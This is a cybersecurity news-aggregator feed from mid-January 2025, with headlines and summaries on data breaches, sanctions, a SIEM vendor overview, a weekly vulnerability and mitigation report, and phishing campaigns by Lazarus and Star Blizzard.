FTC orders GM to stop collecting and selling driver’s dataThe Federal Trade Commission (FTC) has announced action against General Motors (GM) and its subsidiary, OnStar, for unlawful collection and sale of drivers' precise geolocation and driving behavior data without first obtaining their consent. [...]
by BleepingComputer
2025-01-18 11:00:00
Navigating IT Liability in 2025: Strategies for Mitigating RisksAs cyberthreats evolve and data privacy laws tighten, companies must address IT liability. Here are key steps every company should take.
by ITPro Today
2025-01-18 11:00:00
TikTok Says It Will ‘Go Dark’ Unless It Gets Clarity From Biden Following Supreme Court RulingTikTok said it will have to “go dark” this weekend unless Biden assures the company it won’t enforce a shutdown after the Supreme Court upheld the ban. The post TikTok Says It Will ‘Go Dark’ Unless It Gets Clarity From Biden Following Supreme Court Ruling appeared first on SecurityWeek.
by SecurityWeek
2025-01-18 10:20:30
Microsoft removes Assassin’s Creed Windows 11 upgrade blocksEarlier this week, Ubisoft released Assassin's Creed Valhalla and Assassin's Creed Origins patches to fix Windows 11 24H2 compatibility issues that caused crashes, freezes, and audio problems. [...]
by BleepingComputer
2025-01-18 10:00:00
CES 2025: 8 Eye-Grabbing Tech InnovationsCES 2025 showcased a blend of cutting-edge AI innovations and standout hardware, proving the future of tech is as imaginative as ever.
by ITPro Today
2025-01-18 08:36:07
TikTok Ban Sparks Debate Over Digital Privacy and Govt ControlThe U.S. Supreme Court has unanimously upheld a federal law banning TikTok unless its parent company, ByteDance, divests its ownership. This decision, grounded in national security concerns, has ignited debates over data privacy, free speech, and the broader impact of government intervention in tech regulation. With TikTok threatening to “go dark” on January 19 unless … The post TikTok Ban Sparks Debate Over Digital Privacy and Govt Control appeared first on CyberInsider.
by Cyber Insider
2025-01-18 07:29:02
Otelier Breach Exposes Marriott, Hilton Bookings and Client InfoHotel management platform Otelier has suffered a major data breach, exposing millions of guest reservations and personal details from well-known hotel brands such as Marriott, Hilton, and Hyatt. The breach, which began in July 2024 and persisted until October, resulted in nearly 8TB of data being stolen from the company's Amazon S3 cloud storage. Otelier, … The post Otelier Breach Exposes Marriott, Hilton Bookings and Client Info appeared first on CyberInsider.
by Cyber Insider
2025-01-18 01:51:10
Bitcoin’s Prospects in 2025: Exploring Opportunities and Mitigating RisksExplore Bitcoin’s 2025 prospects, market trends, mining, and secure methods like cloud platforms. Learn strategies to manage risks…
by Hackread
2025-01-17 22:24:17
EU privacy non-profit group filed complaints against TikTok, SHEIN, AliExpress, and other Chinese companiesnoyb files complaints against TikTok, AliExpress, and other Chinese companies for illegal EU user data transfers to China, violating data protection laws. Austrian privacy non-profit group None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully […]
by Security Affairs
2025-01-17 22:22:05
How VCs Are Looking at AI Startups TodayVC firms are focusing on both the technology and the teams behind AI startups, recognizing that successful investments will require adaptability, strategic direction, and innovation in a rapidly evolving market.
by ITPro Today
2025-01-17 22:03:46
Has the TikTok Ban Already Backfired on US Cybersecurity?The Supreme Court has affirmed TikTok's ban in the US, which has its users in revolt and is creating a whole new set of national cybersecurity concerns.
by Dark Reading
2025-01-17 21:53:23
Effective Security Awareness Training Really Does Reduce Data BreachesSocial engineering and phishing are involved in 70% - 90% of data breaches. No other root cause of malicious hacking (e.g., unpatched software and firmware, eavesdropping, cryptography attacks, physical theft, etc.) comes close.
by KnowBe4
2025-01-17 21:36:35
‘Surveillance pricing’ means higher costs for consumers, preliminary FTC report saysThe FTC posted a preliminary report that said businesses do sometimes charge customers more for products based on insights gleaned from online behavior. The commission's incoming GOP majority objected to the document's release.
by The Record
2025-01-17 20:25:59
National Security Memorandum (NSM) on Artificial Intelligence: Democracy + Tech Initiative MarkupOn October 24, 2024, the Biden Administration released its National Security Memorandum (NSM) on Artificial Intelligence. Read along with AC Tech Programs staff, fellows, and industry experts for commentary and analysis. The post National Security Memorandum (NSM) on Artificial Intelligence: Democracy + Tech Initiative Markup appeared first on DFRLab.
by DFRLab
2025-01-17 20:23:43
Employees Enter Sensitive Data Into GenAI Prompts Far Too OftenThe propensity for users to enter customer data, source code, employee benefits information, financial data, and more into ChatGPT, Copilot, and others is racking up real risk for enterprises.
by Dark Reading
2025-01-17 19:48:49
Homeland Security nominee Kristi Noem bashes CISA, says agency must be 'smaller, more nimble'The South Dakota governor said efforts to address foreign disinformation campaigns were "far off mission" for the Cybersecurity and Infrastructure Security Agency.
by The Record
2025-01-17 19:44:31
15K Fortinet Device Configs Leaked to the Dark WebThe stolen firewall data is thorough but more than 2 years old now, meaning that most organizations following even basic security practices face minimal risk, hopefully.
by Dark Reading
2025-01-17 19:43:18
US Sanctions Chinese Hacker & Firm for Treasury, Critical Infrastructure BreachesThe cyber actor played a role in the Treasury breach as well as attacks on critical infrastructure, linked to China-backed advanced persistent threat (APT) group Salt Typhoon.
by Dark Reading
2025-01-17 19:38:00
Critical Flaws in WGS-804HPT Switches Enable RCE and Network ExploitationCybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. "These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker
by The Hacker News
2025-01-17 18:56:12
Detecting and mitigating CVE-2024-12084: rsync remote code executionOn Tuesday, January 14, 2025, a set of vulnerabilities were announced that affect the “rsync” utility. Rsync allows files and... The post Detecting and mitigating CVE-2024-12084: rsync remote code execution appeared first on Sysdig.
by Sysdig
2025-01-17 18:48:19
The FCC’s Jessica Rosenworcel Isn’t Leaving Without a FightAs the US faces “the worst telecommunications hack in our nation’s history,” by China’s Salt Typhoon hackers, the outgoing FCC chair is determined to bolster network security if it’s the last thing she does.
by WIRED Security News
2025-01-17 18:36:00
Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform ProliferationCybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks
by The Hacker News
2025-01-17 18:26:57
Costa Rica refinery cyberattack was first deployment for new US response program, ambassador saysA recent ransomware attack on RECOPE, Costa Rica's state-run energy company, was the first real-world test for FALCON, a new State Department program for foreign incident response, a top diplomat tells Recorded Future News.
by The Record
2025-01-17 18:19:35
‘Sneaky Log’ phishing kits slip by Microsoft 365 accountsPhishing-as-a-Service kits intercept user credentials and 2FA, bypassing many email and secure web gateways.
by SC Media
2025-01-17 18:04:45
SIEM Vendors: Leading the Way in Cybersecurity Monitoring and Threat Detection

The ability to detect, analyze, and respond to threats in real time is critical. Security Information and Event Management solutions play a pivotal role in helping organizations achieve this by providing a comprehensive view of their IT environment, detecting anomalies, and offering actionable insights for incident response. The SIEM market has grown substantially, with numerous vendors offering a variety of solutions tailored to meet different business needs. In this article, we will explore the leading SIEM vendors and what they offer.

What is SIEM

Security Information and Event Management (SIEM) refers to the technology that combines security information management (SIM) and security event management (SEM). SIEM solutions collect and aggregate log data from a variety of sources (network devices, applications, security tools, etc.), providing real-time monitoring, event correlation, and security alerting. These solutions enable businesses to detect potential security breaches, respond promptly, and maintain compliance with industry regulations.

Key functionalities of SIEM include:
Log Management: Collecting and storing logs from diverse sources.
Event Correlation: Analyzing logs to identify security threats.
Alerting and Reporting: Triggering alerts based on suspicious activity and generating compliance reports.
Incident Response: Providing information to facilitate the detection and resolution of security incidents.

Leading SIEM Vendors in the Market

Splunk
Overview: Splunk is one of the most popular and well-known SIEM vendors, offering an advanced platform for searching, monitoring, and analyzing machine data. It provides a comprehensive security solution, allowing businesses to gain deep visibility into their IT infrastructure and respond to security incidents effectively.
Key Features:
Powerful search and analytics engine.
Real-time security monitoring and alerting.
Advanced correlation capabilities to detect complex threats.
Scalability to handle large amounts of data.
Best for: Enterprises requiring flexible, customizable, and highly scalable solutions.

IBM QRadar
Overview: IBM QRadar is a robust SIEM platform that offers comprehensive security monitoring, event correlation, and real-time data analysis. It integrates seamlessly with other IBM security products and provides a unified view of an organization’s security posture.
Key Features:
Advanced threat detection and analytics.
Pre-configured security use cases for faster deployment.
High-quality reporting and compliance support.
Automated incident response workflows.
Best for: Large enterprises and organizations with complex security environments.

LogRhythm
Overview: LogRhythm is a well-regarded SIEM vendor that focuses on providing an integrated security platform. It offers a comprehensive solution for threat detection, monitoring, and compliance. LogRhythm is known for its ease of use and ability to integrate with existing IT infrastructure.
Key Features:
Centralized log management and real-time event correlation.
Advanced anomaly detection and behavioral analytics.
Automated workflows for incident response.
Out-of-the-box integrations with many security tools and systems.
Best for: Mid-sized businesses looking for an intuitive, easy-to-deploy solution.

SolarWinds
Overview: SolarWinds is a well-known IT management company that also offers a powerful SIEM solution. SolarWinds’ SIEM solution is particularly well-suited for businesses looking for a cost-effective, scalable, and user-friendly platform.
Key Features:
Real-time monitoring and security event correlation.
Incident response and alerting.
Integrated network performance monitoring.
Customizable dashboards and reports.
Best for: Small to mid-sized businesses and organizations with a focus on network performance.

AlienVault (AT&T Cybersecurity)
Overview: AlienVault, now part of AT&T Cybersecurity, is an affordable, cloud-based SIEM solution that offers essential features for threat detection and compliance. It is popular among businesses that require a budget-friendly option with high-quality threat intelligence.
Key Features:
Built-in threat intelligence feeds.
Automated log collection and analysis.
Compliance reporting (PCI DSS, HIPAA, GDPR).
Simple, easy-to-deploy solution with cloud-based options.
Best for: Small businesses and organizations with limited resources seeking a user-friendly solution.

Sumo Logic
Overview: Sumo Logic is a cloud-native SIEM solution known for its ease of deployment and scalability. The platform is designed to handle large-scale environments and provides real-time analytics, monitoring, and insights.
Key Features:
Cloud-based architecture for seamless scalability.
Real-time monitoring and log analytics.
Machine learning-powered anomaly detection.
Integrated compliance and security monitoring.
Best for: Organizations adopting a cloud-first strategy and businesses with large, distributed environments.

McAfee Enterprise Security Manager (ESM)
Overview: McAfee’s Enterprise Security Manager (ESM) offers real-time threat intelligence, log management, and event correlation. It is particularly well-suited for organizations looking to integrate SIEM with McAfee’s security products for enhanced threat protection.
Key Features:
Automated incident detection and response.
Centralized log management for large enterprises.
Integration with McAfee’s security ecosystem.
Compliance reporting and auditing.
Best for: Enterprises with existing McAfee security solutions and those seeking deep integration with endpoint protection.

Fortinet FortiSIEM
Overview: FortiSIEM is a unified SIEM solution that offers comprehensive security monitoring, analytics, and response capabilities. The platform is integrated with Fortinet’s suite of cybersecurity solutions, providing enhanced visibility into network security.
Key Features:
Correlation of security events from multiple sources.
Threat intelligence integration for better detection.
Real-time monitoring and compliance reporting.
Scalability for large and complex environments.
Best for: Organizations already using Fortinet products or those needing a highly integrated security solution.

Choosing the Right SIEM Vendor

Selecting the right SIEM solution depends on various factors, including your organization’s size, complexity, security needs, and budget. Here are a few considerations to keep in mind when choosing a SIEM vendor:
Scalability: Ensure the SIEM solution can scale as your organization grows.
Ease of Use: Choose a platform that your team can easily deploy and manage.
Integration: Ensure the SIEM solution can integrate with your existing security infrastructure and tools.
Customization: Look for a solution that can be tailored to meet your organization’s specific security needs.
Threat Intelligence: Ensure the solution provides strong threat intelligence feeds and advanced analytics for accurate threat detection.

Conclusion

The market for SIEM solutions is diverse, with many vendors offering specialized capabilities designed to meet the varying needs of businesses across different industries. Whether you’re a large enterprise or a small business, choosing the right SIEM vendor can significantly enhance your security posture by enabling better visibility, quicker threat detection, and more effective incident response.
By understanding the strengths and capabilities of each SIEM vendor, organizations can make informed decisions and select the platform that best fits their needs, ultimately improving their overall cybersecurity defense.rtant: Your blog article will go under a review by one of our admin or moderator just to prevent spams and will approved or our moderators will get in touch with you to solve the issue or suggest improvements - essentially a editorial support.
by HACKLIDO
2025-01-17 17:57:25
Feds worry AT&T breach could out informantsThe FBI is reportedly in a panic over a possible leak of informant data thanks to an AT&T data breach
by SC Media
2025-01-17 17:30:00
US Government Agencies Call for Closing the Software Understanding GapCISA and other agencies call to action for the US government to take steps to close the software understanding gap. The post US Government Agencies Call for Closing the Software Understanding Gap appeared first on SecurityWeek.
by SecurityWeek
2025-01-17 17:18:55
FTC cracks down on Genshin Impact gacha loot box practicesGenshin Impact developer Cognosphere (aka Hoyoverse) has agreed to a $20 million settlement with the U.S. Federal Trade Commission (FTC) over its gacha loot box monetization and is now banned from selling them to teens under the age of sixteen without parental consent. [...]
by BleepingComputer
2025-01-17 17:10:38
Treasury sanctions Salt Typhoon hacking group behind breaches of major US telecom firmsThe US government has also sanctioned the hacker responsible for December's US Treasury hack.
by TechCrunch
2025-01-17 17:05:43
Malware stole internal PowerSchool passwords from engineer’s hacked computerThe theft of a PowerSchool engineer's passwords prior to the breach raises further doubts about the company's security practices.
by TechCrunch
2025-01-17 17:00:00
AIs in Love, UEFI, Fortinet, Godaddy, Juggalos, Aaran Leyland, and More. - SWN #443
by SC Media
2025-01-17 16:55:39
TikTok’s national security risk warrants ban, Supreme Court rulesThe ruling could have implications for other foreign-owned applications.
by SC Media
2025-01-17 16:34:29
Biden's Cybersecurity EO Leaves Trump a Comprehensive Blueprint for DefenseNew order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?
by ITPro Today
2025-01-17 16:25:04
WhatsApp spear phishing campaign uses QR codes to add deviceA cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...
by Malwarebytes Labs
2025-01-17 16:09:25
Apple’s CUPS Printing System Vulnerable to Spoofing AttacksSecurity researcher Simone Margaritelli has publicly disclosed a critical vulnerability in Apple’s Common UNIX Printing System (CUPS), revealing that the service fails to verify TLS certificates. This flaw allows attackers on the same network to impersonate IPP-over-HTTPS (IPPS) printers and intercept, modify, or redirect print jobs — potentially exposing sensitive data and enabling broader system … The post Apple’s CUPS Printing System Vulnerable to Spoofing Attacks appeared first on CyberInsider.
by Cyber Insider
2025-01-17 15:51:00
How to Bring Zero Trust to Wi-Fi Security with a Cloud-based Captive Portal?Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access,
by The Hacker News
2025-01-17 15:37:00
New 'Sneaky 2FA' Phishing Kit Targets Microsoft 365 Accounts with 2FA Code BypassCybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that's capable of targeting Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting
by The Hacker News
2025-01-17 15:37:00
U.S. Sanctions North Korean IT Worker Network Supporting WMD ProgramsThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People's Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions. "These
by The Hacker News
2025-01-17 15:17:22
Otelier data breach exposes info, hotel reservations of millionsHotel management platform Otelier suffered a data breach after threat actors breached its Amazon S3 cloud storage to steal millions of guests' personal information and reservations for well-known hotel brands like Marriott, Hilton, and Hyatt. [...]
by BleepingComputer
2025-01-17 15:11:12
Advanced Persistent Threat (APT): Examples and PreventionAdvanced persistent threats (APTs) use sophisticated tools and techniques to breach systems and maintain access—all while remaining undetected. Unlike other cyberattacks, APTs work over an extended period, using more resources to achieve specific objectives, such as stealing sensitive data or bringing down operations.
by Legit Security
2025-01-17 15:00:00
Leveraging Behavioral Insights to Counter LLM-Enabled HackingAs LLMs broaden access to hacking and diversify attack strategies, understanding the thought processes behind these innovations will be vital for bolstering IT defenses.
by Dark Reading
2025-01-17 14:46:39
Tarbomb Denial of Service via Path TraversalPraetorian recently uncovered a denial-of-service vulnerability by chaining together path traversal and legacy file upload features in a CI/CD web application, highlighting the risks of undocumented features and the importance of input validation in web security. The post Tarbomb Denial of Service via Path Traversal appeared first on Praetorian.
by Praetorian
2025-01-17 14:38:18
U.S. CISA adds Aviatrix Controllers vulnerability to its Known Exploited Vulnerabilities catalogU.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Aviatrix Controllers vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical Aviatrix Controllers OS Command Injection vulnerability, tracked as CVE-2024-50603 (CVSS score of 10) to its Known Exploited Vulnerabilities (KEV) catalog. The flaw impacts Aviatrix Controller pre-7.1.4191 and 7.2.x […]
by Security Affairs
2025-01-17 14:16:58
FTC Bashes General Motors (GM) for Selling Driver Tracking DataThe Federal Trade Commission (FTC) has announced enforcement action against General Motors (GM) and its subsidiary, OnStar, for allegedly collecting and selling drivers' precise geolocation and driving behavior data without proper consent. Under a proposed settlement, GM and OnStar will be barred from sharing such data with consumer reporting agencies for five years and must … The post FTC Bashes General Motors (GM) for Selling Driver Tracking Data appeared first on CyberInsider.
by Cyber Insider
2025-01-17 14:16:28
Malicious PyPi package steals Discord auth tokens from devsA malicious package named 'pycord-self' on the Python package index (PyPI) targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system. [...]
by BleepingComputer
2025-01-17 14:02:37
Star Blizzard Targets WhatsApp Accounts in Tricky QR Code AttackMicrosoft Threat Intelligence has uncovered a new spear-phishing campaign by the Russian threat actor Star Blizzard, marking a significant shift in their tactics. The campaign, observed in mid-November 2024, exploits WhatsApp’s account linking feature to gain unauthorized access to messages. This is the first time Star Blizzard has used WhatsApp as an attack vector, following … The post Star Blizzard Targets WhatsApp Accounts in Tricky QR Code Attack appeared first on CyberInsider.
by Cyber Insider
2025-01-17 14:00:00
Your KnowBe4 Compliance Plus Fresh Content Updates from December 2024Check out the December updates in Compliance Plus so you can stay on top of featured compliance training content.
by KnowBe4
2025-01-17 14:00:00
How to calculate your AI-powered cybersecurity’s ROIImagine this scenario: A sophisticated, malicious phishing campaign targets a large financial institution. The attackers use emails generated by artificial intelligence (AI) that closely mimic the company’s internal communications. The emails contain malicious links designed to steal employee credentials, which the attackers could use to gain access to company assets and data for unknown purposes. […] The post How to calculate your AI-powered cybersecurity’s ROI appeared first on Security Intelligence.
by Security Intelligence
2025-01-17 13:32:19
Ransomware Gangs Claimed More Than 5,000 Attacks in 2024Ransomware groups claimed responsibility for 5,461 attacks in 2024, with 1,204 of these attacks being publicly confirmed by victim organizations, according to Comparitech’s latest Ransomware Roundup report.
by KnowBe4
2025-01-17 13:31:27
Brad Pitt Romance Scams Pushed By AI-Enabled DeepfakesI have helped people detect romance scams for decades. It is still very common for romance scammers to leverage both pictures of celebrities and pictures of innocent, everyday people as part of these scams.
by KnowBe4
2025-01-17 12:59:49
Weekly IT Vulnerability Report: Critical Updates for SAP, Microsoft, Fortinet, and OthersKey vulnerabilities in SAP, Microsoft, Fortinet, and others demand immediate attention as threat actors exploit critical flaws.
Overview
Cyble Research and Intelligence Labs (CRIL) analyzed significant IT vulnerabilities disclosed between January 8 and 14, 2025. The Cybersecurity and Infrastructure Security Agency (CISA) added seven vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Microsoft released its January 2025 Patch Tuesday updates, addressing 159 vulnerabilities, including eight zero-days, three of which are under active exploitation. Other notable vulnerabilities this week are flaws in SAP NetWeaver Application Server and other high-profile products. CRIL’s monitoring of underground forums also revealed discussions on critical zero-day vulnerabilities and their potential weaponization.
Key Vulnerabilities
SAP NetWeaver and BusinessObjects
- CVE-2025-0070: Improper authentication in SAP NetWeaver AS for ABAP, enabling privilege escalation.
- CVE-2025-0066: Weak access controls leading to unauthorized information disclosure.
- CVE-2025-0063: SQL injection vulnerability allowing unauthorized database manipulation.
- CVE-2025-0061: Session hijacking in SAP BusinessObjects, risking sensitive data exposure.
Impact: SAP NetWeaver’s foundational role in critical industries like finance, healthcare, and manufacturing makes these vulnerabilities particularly concerning.
Mitigation: Patches are available for all vulnerabilities, and immediate application is recommended.
Fortinet FortiOS
- CVE-2024-55591: A critical authorization bypass vulnerability in FortiOS with a CVSS score of 9.8, allowing unauthorized users to execute arbitrary commands.
Impact: Exploited in the wild, this vulnerability has been observed in attempts to gain super-admin privileges on affected systems.
Mitigation: Upgrade FortiOS to the latest patched versions (7.0.17 or above for version 7.0 and 7.2.13 or above for version 7.2).
Also read: Fortinet’s Authentication Bypass Zero-Day: Mitigation Strategies and IoCs for Enhanced Security
Microsoft Hyper-V
- CVE-2025-21333, CVE-2025-21334, CVE-2025-21335: Use-after-free and buffer overflow vulnerabilities in Microsoft Hyper-V NT Kernel Integration VSP.
Impact: These vulnerabilities pose risks of denial-of-service or privilege escalation within virtualized environments.
Mitigation: Apply Microsoft’s January Patch Tuesday updates.
Vulnerabilities on Underground Forums
CRIL observed active discussions and Proof-of-Concept (PoC) code for vulnerabilities on underground forums:
- CVE-2024-55956: Critical unauthenticated file upload vulnerability in Cleo Harmony, VLTrader, and LexiCom products, allowing arbitrary code execution. Observed Activity: PoC shared on Telegram by a threat actor.
- CVE-2024-45387: SQL injection vulnerability in Apache Traffic Ops, enabling attackers to execute SQL commands against backend databases. Observed Activity: Threat actor "dragonov_66" posted PoC on cybercrime forums.
Additionally, a threat actor advertised for sale zero-day pre-authentication Remote Code Execution (RCE) vulnerabilities affecting GoCloud Routers and Entrolink PPX VPN services.
CISA’s Known Exploited Vulnerabilities (KEV) Catalog
The following vulnerabilities were added to CISA’s KEV catalog:
CVE ID | Vendor | Product | CVSSv3 | Exploitation
CVE-2025-21335 | Microsoft | Windows | 7.8 | Not observed
CVE-2024-55591 | Fortinet | FortiOS | 9.8 | Observed
CVE-2023-48365 | Qlik | Sense | 9.8 | Observed
CVE-2025-0282 | Ivanti | Connect Secure | 9.0 | Observed
Also read: Inside the Active Threats of Ivanti’s Exploited Vulnerabilities
Recommendations
To mitigate risks associated with the identified vulnerabilities:
- Apply Patches Promptly: Install vendor-released patches for all affected products immediately. Use tools like Fortinet’s upgrade path utility for smooth version transitions.
- Implement Network Segmentation: Isolate critical assets using VLANs and firewalls. Restrict access to administrative interfaces through IP whitelisting.
- Monitor for Indicators of Compromise (IoCs): Analyze logs for suspicious activities, such as unauthorized account creation or modifications to security policies. Investigate IPs associated with malicious activity: 45.55.158.47, 87.249.138.47, 149.22.94.37.
- Strengthen Incident Response Plans: Regularly test and update incident response protocols to address emerging threats.
- Enhance Visibility: Maintain an up-to-date inventory of assets and perform regular vulnerability assessments.
- Adopt Multi-Factor Authentication (MFA): Ensure strong authentication measures for all accounts, especially admin accounts.
- Engage in Threat Intelligence Monitoring: Stay informed about security advisories from vendors and public authorities, including CISA and CERTs.
The post Weekly IT Vulnerability Report: Critical Updates for SAP, Microsoft, Fortinet, and Others appeared first on Cyble.
by CYBLE
2025-01-17 12:10:46
Why Many New AI Tools Aren’t Available In Europe – And How To Access ThemExplore how AI tools like OpenAI’s Sora face restrictions in Europe due to GDPR, with insights on bypassing…
by Hackread
2025-01-17 12:06:38
LinkedIn Job Scams Are the Latest Cyber Threat – Don’t Fall for Fake RecruitersFor many professionals, LinkedIn is a lifeline—a platform to connect, grow, and land the next big opportunity. But for some unsuspecting job seekers, it’s becoming a minefield of cyber threats.
Take John Carlo Galvez, for example. His LinkedIn profile paints the picture of a polished recruiter with connections to top-tier organizations. A smiling profile photo adds to the credibility. But here’s the catch—John isn’t real. Neither are Margaret Blackmore or Sally Redaza, two other supposed “recruiters” on the platform. Behind these profiles lies something far more sinister: North Korea’s notorious Lazarus Group. Known for their cyber espionage and high-profile attacks, this Advanced Persistent Threat (APT) group has now infiltrated LinkedIn to target professionals worldwide. Cybersecurity researcher Dominic Alvieri brought this worrying development to light in a LinkedIn post, urging users to stay vigilant.
A Polished Facade, A Dangerous Trap
Scrolling through John Carlo Galvez’s LinkedIn profile, there’s nothing out of place at first glance. He claims to be recruiting for major firms, complete with a list of tempting job offers. But those who take the bait quickly find themselves entangled in a web of deceit. The cybersecurity expert who flagged the fake accounts believes these profiles are meticulously crafted to appear genuine. They’re not just targeting individuals with run-of-the-mill scams; instead, they focus on professionals in the cryptocurrency and financial sectors. The group uses names like Binance, Ripple, YouHodler, and Bitget to add legitimacy to their lures.
How It Works: The Recruitment Ruse
Imagine receiving a LinkedIn message from a recruiter who seems to have the perfect job for you. The role aligns with your experience, offers a lucrative salary, and even promises remote work flexibility. Excited, you click on the job description link—only to unknowingly download malware. From there, the attackers have access to your device, files, and potentially your employer’s network. These operations are not about stealing one person’s data; they’re designed to infiltrate organizations and carry out large-scale attacks. Europol, the U.S. Department of Justice, and the FBI have all raised red flags about Lazarus Group’s evolving tactics. Their ability to blend into professional spaces like LinkedIn is a chilling reminder that no platform is immune to cyber threats.
The Human Cost
For job seekers, especially those in industries hit hard by layoffs, the emotional toll of such scams can be devastating. Imagine pinning your hopes on a dream job, only to discover you’ve fallen victim to a scam that compromises not only your personal data but also your professional reputation. One victim, who wished to remain anonymous, shared their story: “It started with a simple LinkedIn message. They sounded so genuine, asking about my skills and career goals. But when I clicked on the job link, everything changed. My laptop froze, and within minutes, my email and LinkedIn accounts were locked. It felt like my world came crashing down.” These attacks prey on people’s trust, a critical factor in professional networking. For many, the experience leaves them feeling betrayed and wary of opportunities that once seemed promising.
Staying Safe: What You Can Do
While LinkedIn remains a valuable tool for career growth, users must be vigilant. Here are some tips to protect yourself from falling victim to such scams:
- Scrutinize Profiles: Look for inconsistencies in the recruiter’s profile. Check their work history, connections, and activity. Fake profiles often have limited information and generic job titles.
- Verify Job Offers: If a recruiter mentions working with a company like Binance or Ripple, cross-check their affiliation through official company channels.
- Be Cautious with Links: Never click on job description links or attachments from unknown sources. When in doubt, type the company’s official website URL directly into your browser.
- Ask Questions: Don’t be afraid to challenge the recruiter. Genuine professionals will welcome questions about the role, company, or hiring process.
- Enable Two-Factor Authentication: Secure your LinkedIn and email accounts with two-factor authentication to prevent unauthorized access.
LinkedIn’s Role in the Fight
LinkedIn has previously stated its commitment to combating fake profiles, but the platform’s size and global reach make this a daunting challenge. Users are encouraged to report suspicious accounts to LinkedIn’s security team, helping the platform identify and remove malicious actors. For now, staying informed and vigilant remains the best defense against such threats. So, next time you receive a message from a recruiter, remember: not everything is as it seems. Ask questions, verify details, and think twice before clicking that link. Because when it comes to cybersecurity, a little caution can go a long way.
by The Cyber Express
2025-01-17 12:00:00
PowerShell Arrays: How To Build, Manipulate, and Manage ThemPowerShell arrays support dynamic operations like adding, modifying, or removing elements, and can also be filtered and manipulated using advanced techniques like slicing, joining, and looping through array items.
by ITPro Today
2025-01-17 11:34:32
Blue Yonder investigating Clop ransomware threat linked to exploited Cleo CVEsThe financially-motivated hacker was previously linked to the mass exploitation of critical vulnerabilities in MOVEit file-transfer software.
by Cybersecurity Dive
2025-01-17 11:00:00
Cloud & Edge Computing Trends and Predictions 2025 From Industry InsidersIT leaders and industry insiders share their cloud computing and edge computing trends and predictions for 2025.
by ITPro Today
2025-01-17 10:47:01
Russian Star Blizzard is Now After Your WhatsApp DataAfter researchers and national cybersecurity agencies revealed key details of the Russia-linked Star Blizzard threat actor in recent days, the group has added a new attack vector to its arsenal that targets victims’ WhatsApp data. Microsoft's Threat Intelligence team spotted the campaign late last year, leveraging the topic of support to Ukrainian NGOs in the face of the ongoing war.
Star Blizzard, also tracked as Callisto, SEABORGIUM, or COLDRIVER, is run by Russia’s FSB or secret service officers, according to previous attribution. The group is known for its targeted spear-phishing campaigns against high-profile targets in the U.S. and U.K., where it has targeted dozens of journalists, think tanks, and non-governmental organizations that support Ukraine and its allies.
Also read: Russia Backed Star Blizzard’s Infiltration Attempts in UK Elections Laid Bare
Star Blizzard Shifts Focus to WhatsApp Data
Historically, the threat actor has used phishing campaigns for initial infection. But detailed advisories from independent cybersecurity firms like Microsoft’s Threat Intelligence team and agencies like the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which exposed the TTPs of this threat actor, have likely forced it to change its tradecraft to evade detection. Star Blizzard has now modified its spear-phishing campaign to target the WhatsApp accounts of its victims rather than their computer data. This is the first time that the threat actor has adopted this technique, researchers said.
The threat actor initiates contact via email, engaging targets before sending a follow-up email with a malicious link. The sender address impersonates a U.S. government official, consistent with Star Blizzard’s tactic of mimicking political or diplomatic figures to boost credibility.
Image: Initial Spear-Phishing mail from Star Blizzard (Credit: MSTIC)
The initial email includes a QR code claiming to direct users to a WhatsApp group focused on supporting Ukraine NGOs. However, the QR code is intentionally broken to prompt the recipient to respond. Upon response, the threat actor sends a second email containing a Safe Links-wrapped t[.]ly shortened link as an alternative to join the group. Following this link redirects the target to a page instructing them to scan a QR code to join the group. In reality, the QR code connects the victim’s WhatsApp account to the threat actor’s device via WhatsApp Web. This grants the attacker access to the victim’s messages, enabling data exfiltration through browser plugins designed for exporting WhatsApp messages.
Microsoft noted that although the campaign ended in November 2024, people and organizations, especially those related to government or diplomacy, defense, research, and assistance to Ukraine in the ongoing conflict with Russia, need to be vigilant and educated about this change in tactics. “We are sharing our information on Star Blizzard’s latest activity to raise awareness of this threat actor’s shift in tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity,” Microsoft said.
by The Cyber Express
2025-01-17 10:27:41
